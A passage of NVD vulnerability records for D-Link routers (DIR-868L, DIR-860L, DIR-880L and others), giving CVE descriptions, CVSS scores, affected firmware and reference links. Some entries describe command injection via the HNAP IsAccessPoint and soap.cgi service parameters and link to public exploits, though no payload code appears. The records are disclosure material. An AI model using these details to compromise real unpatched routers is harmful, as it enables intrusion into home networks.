"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-07-13T20:29:01.003",
"references": [
{
"source": "cret@cert.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Nov/38"
},
{
"source": "cret@cert.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/94130"
},
{
"source": "cret@cert.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/40805/"
},
{
"source": "cret@cert.org",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "https://www.kb.cert.org/vuls/id/677427"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Nov/38"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/94130"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/40805/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "https://www.kb.cert.org/vuls/id/677427"
}
],
"sourceIdentifier": "cret@cert.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-121"
}
],
"source": "cret@cert.org",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2021-06-04 20:15
Modified
2024-11-21 05:23
Severity ?
Summary
The D-Link router DIR-868L 3.01 is vulnerable to credentials disclosure in telnet service through decompilation of firmware, that allows an unauthenticated attacker to gain access to the firmware and to extract sensitive data.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| disclose@cybersecurityworks.com | https://cybersecurityworks.com/zerodays/cve-2020-29321-telnet-hardcoded-credentials.html | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://cybersecurityworks.com/zerodays/cve-2020-29321-telnet-hardcoded-credentials.html | Exploit, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-868l_firmware | 3.01 | |
| dlink | dir-868l | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:3.01:*:*:*:*:*:*:*",
"matchCriteriaId": "05A188F6-FCC2-4903-BFC6-D0F675191A91",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "33B501D4-BDDD-485E-A5A3-8AA8D5E46061",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The D-Link router DIR-868L 3.01 is vulnerable to credentials disclosure in telnet service through decompilation of firmware, that allows an unauthenticated attacker to gain access to the firmware and to extract sensitive data."
},
{
"lang": "es",
"value": "El router D-Link DIR-868L versi\u00f3n 3.01 es vulnerable a una divulgaci\u00f3n de credenciales en el servicio telnet a trav\u00e9s de la descompilaci\u00f3n del firmware, lo que permite a un atacante no autenticado conseguir acceso al firmware y extraer datos confidenciales"
}
],
"id": "CVE-2020-29321",
"lastModified": "2024-11-21T05:23:54.107",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-06-04T20:15:07.607",
"references": [
{
"source": "disclose@cybersecurityworks.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://cybersecurityworks.com/zerodays/cve-2020-29321-telnet-hardcoded-credentials.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://cybersecurityworks.com/zerodays/cve-2020-29321-telnet-hardcoded-credentials.html"
}
],
"sourceIdentifier": "disclose@cybersecurityworks.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-522"
},
{
"lang": "en",
"value": "CWE-798"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2019-05-13 14:29
Modified
2024-11-21 03:58
Severity ?
Summary
D-Link DIR-822 Rev.B 202KRb06, DIR-822 Rev.C 3.10B06, DIR-860L Rev.B 2.03.B03, DIR-868L Rev.B 2.05B02, DIR-880L Rev.A 1.20B01_01_i3se_BETA, and DIR-890L Rev.A 1.21B02_BETA devices mishandle IsAccessPoint in /HNAP1/SetAccessPointMode. In the SetAccessPointMode.php source code, the IsAccessPoint parameter is saved in the ShellPath script file without any regex checking. After the script file is executed, the command injection occurs. A vulnerable /HNAP1/SetAccessPointMode XML message could have shell metacharacters in the IsAccessPoint element such as the `telnetd` string.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990 | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990 | Exploit, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| d-link | dir-818lw_firmware | 2.05.b03 | |
| dlink | dir-818lw | - | |
| d-link | dir-822_firmware | 202krb06 | |
| dlink | dir-822_firmware | 3.10b06 | |
| dlink | dir-822 | - | |
| d-link | dir-860l_firmware | 2.03.b03 | |
| dlink | dir-860l | - | |
| d-link | dir-868l_firmware | 2.05b02 | |
| dlink | dir-868l | - | |
| d-link | dir-880l_firmware | 1.20b01_01_i3se | |
| dlink | dir-880l | - | |
| d-link | dir-890l\/r_firmware | 1.21b02 | |
| dlink | dir-890l\/r | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:d-link:dir-818lw_firmware:2.05.b03:*:*:*:*:*:*:*",
"matchCriteriaId": "1A1B5838-62C0-4836-861C-8E99DD280154",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-818lw:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4725FC82-72B5-4EAB-91C6-D32194C5D4F9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:d-link:dir-822_firmware:202krb06:*:*:*:*:*:*:*",
"matchCriteriaId": "5224FC0A-44C6-4C4D-8EEC-BBA7BA13DF3D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dir-822_firmware:3.10b06:*:*:*:*:*:*:*",
"matchCriteriaId": "DB427709-D236-4CA6-851C-95323D53DBEB",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-822:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B3894F0E-37F8-4A89-87AC-1DB524D4AE04",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:d-link:dir-860l_firmware:2.03.b03:*:*:*:*:*:*:*",
"matchCriteriaId": "54EA5944-7DCB-4D20-894F-D5A291684EAF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-860l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CCDB9720-8F5A-4F02-A436-920CDAC15D69",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:d-link:dir-868l_firmware:2.05b02:*:*:*:*:*:*:*",
"matchCriteriaId": "21680BA3-2C38-4E14-97F4-480F5B6EC3FB",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "33B501D4-BDDD-485E-A5A3-8AA8D5E46061",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:d-link:dir-880l_firmware:1.20b01_01_i3se:beta:*:*:*:*:*:*",
"matchCriteriaId": "CFE416FB-A5D4-4383-B1E5-5DB8F93A3233",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-880l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC772491-6371-4712-B358-E74D9C5062FD",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:d-link:dir-890l\\/r_firmware:1.21b02:beta:*:*:*:*:*:*",
"matchCriteriaId": "41488604-8598-4929-9F2E-049CBE7B30F1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-890l\\/r:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8F65AC17-E770-4711-9D81-D7D76D5D66BF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-822 Rev.B 202KRb06, DIR-822 Rev.C 3.10B06, DIR-860L Rev.B 2.03.B03, DIR-868L Rev.B 2.05B02, DIR-880L Rev.A 1.20B01_01_i3se_BETA, and DIR-890L Rev.A 1.21B02_BETA devices mishandle IsAccessPoint in /HNAP1/SetAccessPointMode. In the SetAccessPointMode.php source code, the IsAccessPoint parameter is saved in the ShellPath script file without any regex checking. After the script file is executed, the command injection occurs. A vulnerable /HNAP1/SetAccessPointMode XML message could have shell metacharacters in the IsAccessPoint element such as the `telnetd` string."
},
{
"lang": "es",
"value": "Se descubri\u00f3 un problema en los dispositivos de D-Link DIR-822 Rev.B 202KRb06, DIR-822 Rev.C 3.10B06, DIR-860L Rev.B 2.03.B03, DIR-868L Rev.B 2.05B02, DIR-880L Rev.A 1.20B01_01_i3se_BETA, and DIR-890L Rev.A 1.21B02_BETA, manejan incorrectamente el par\u00e1metro IsAccessPoint en el archivo /HNAP1/SetAccessPointMode. En el c\u00f3digo fuente SetAccessPointMode.php, el par\u00e1metro IsAccessPoint es almacenado en el archivo de script ShellPath sin ninguna comprobaci\u00f3n regex. despu\u00e9s que se ejecute el archivo de script, se ocurre la inyecci\u00f3n de comandos. Un mensaje XML vulnerable /HNAP1/SetAccessPointMode podr\u00eda tener metacaracteres shell en el elemento IsAccessPoint, como la cadena `telnetd`."
}
],
"id": "CVE-2018-19987",
"lastModified": "2024-11-21T03:58:56.823",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2019-05-13T14:29:01.207",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-04-04 19:29
Modified
2024-11-21 04:15
Severity ?
Summary
authentication.cgi on D-Link DIR-868L devices with Singapore StarHub firmware before v1.21SHCb03 allows remote attackers to execute arbitrary code.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://www.dlink.com.sg/dir-868l/#firmware | Patch, Vendor Advisory | |
| cve@mitre.org | https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in--d-link-router-dir868.html | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.dlink.com.sg/dir-868l/#firmware | Patch, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in--d-link-router-dir868.html | Patch, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | singapore_starhub_firmware | * | |
| dlink | dir-868l | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:singapore_starhub_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "80D848C7-32C6-4A54-BD4A-B99A773FADC1",
"versionEndExcluding": "1.21shcb03",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "33B501D4-BDDD-485E-A5A3-8AA8D5E46061",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "authentication.cgi on D-Link DIR-868L devices with Singapore StarHub firmware before v1.21SHCb03 allows remote attackers to execute arbitrary code."
},
{
"lang": "es",
"value": "authentication.cgi en dispositivos D-Link DIR-868L con firmware Singapore StarHub en versiones anteriores a la v1.21SHCb03 permite que atacantes remotos ejecuten c\u00f3digo arbitrario."
}
],
"id": "CVE-2018-9284",
"lastModified": "2024-11-21T04:15:17.563",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": true,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-04-04T19:29:00.597",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.dlink.com.sg/dir-868l/#firmware"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in--d-link-router-dir868.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.dlink.com.sg/dir-868l/#firmware"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in--d-link-router-dir868.html"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-03-06 20:29
Modified
2025-02-04 21:15
Severity ?
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-860l_firmware | * | |
| dlink | dir-860l | - | |
| dlink | dir-865l_firmware | * | |
| dlink | dir-865l | - | |
| dlink | dir-868l_firmware | * | |
| dlink | dir-868l | - | |
| dlink | dir-880l_firmware | * | |
| dlink | dir-880l | - |
{
"cisaActionDue": "2022-09-29",
"cisaExploitAdd": "2022-09-08",
"cisaRequiredAction": "The vendor D-Link published an advisory stating the fix under CVE-2018-20114 properly patches KEV entry CVE-2018-6530. If the device is still supported, apply updates per vendor instructions. If the affected device has since entered its end-of-life, it should be disconnected if still in use.",
"cisaVulnerabilityName": "D-Link Multiple Routers OS Command Injection Vulnerability",
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-860l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3887A644-753A-4CA3-9D79-0718057EEB3B",
"versionEndIncluding": "a1_fw110b04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-860l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CCDB9720-8F5A-4F02-A436-920CDAC15D69",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-865l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0624940E-9466-40BA-97E4-648537A092C0",
"versionEndIncluding": "reva_firmware_patch_1.08.b01",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-865l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3A853DF-6DF1-4E8E-8D55-95279EE0CB30",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DE2D4824-B834-41EA-8F70-AF12720030C9",
"versionEndIncluding": "a1_fw112b04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "33B501D4-BDDD-485E-A5A3-8AA8D5E46061",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-880l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2E9B68DE-D3A7-4973-9D47-7203B2190F82",
"versionEndIncluding": "reva_firmware_patch_1.08b04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-880l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC772491-6371-4712-B358-E74D9C5062FD",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter."
},
{
"lang": "es",
"value": "Vulnerabilidad de inyecci\u00f3n de comandos del sistema operativo en soap.cgi (soapcgi_main en cgibin) en D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 y versiones anteriores, DIR-868L DIR868LA1_FW112b04 y versiones anteriores, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 y versiones anteriores y DIR-860L DIR860LA1_FW110b04 y versiones anteriores permite que atacantes remotos ejecuten comandos arbitrarios del sistema operativo mediante el par\u00e1metro service."
}
],
"id": "CVE-2018-6530",
"lastModified": "2025-02-04T21:15:16.167",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": true,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2018-03-06T20:29:00.987",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-880L/REVA/DIR-880L_REVA_FIRMWARE_PATCH_NOTES_1.08B06_EN_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-880L/REVA/DIR-880L_REVA_FIRMWARE_PATCH_NOTES_1.08B06_EN_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
}